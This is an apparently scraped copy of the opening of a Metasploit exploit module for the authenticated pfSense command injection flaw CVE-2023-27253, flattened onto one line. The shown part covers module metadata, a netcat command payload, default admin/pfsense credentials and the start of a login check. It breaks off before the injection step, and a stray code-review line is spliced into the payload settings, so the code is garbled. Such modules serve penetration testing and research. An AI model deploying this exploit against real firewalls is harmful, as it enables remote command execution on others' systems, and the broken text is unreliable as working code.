pfSense授权RCE漏洞（CVE-2023-27253）

class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'pfSense Restore RRD Data Command Injection', 'Description' => %q{ This module exploits an OS Command Injection vulnerability in the pfSense Config Module (CVE-2023-27253). The vulnerability affects versions <= 2.6.0 and can be exploited by an authenticated user if they have the "WebCfg - Diagnostics: Backup & Restore" privilege. }, 'License' => MSF_LICENSE, 'Author' => [ 'Emir Polat', # vulnerability discovery & metasploit module ], 'References' => [ ['CVE', '2023-27253'], ['URL', 'https://redmine.pfsense.org/issues/13935'] ], 'DisclosureDate' => '2023-03-18', 'Platform' => ['unix'], 'Arch' => [ ARCH_CMD ], 'Privileged' => true, 'Targets' => [ [ 'Automatic Target', {}] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x2F\x27", 'DisableNops' => true, emirpolatt marked this conversation as resolved. 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat' } }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'DefaultTarget' => 0 ) ) register_options [ OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense']) ] end def check csrf = get_csrf('index.php', nil, 'GET') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path + 'index.php'), 'method' => 'POST', 'vars_post' => { '__csrf_magic' => csrf, 'usernamefld' => datastore['USERNAME'], 'passwordfld' => datastore['PASSWORD'], 'login' => '' } ) @auth_cookies = res.get_cookies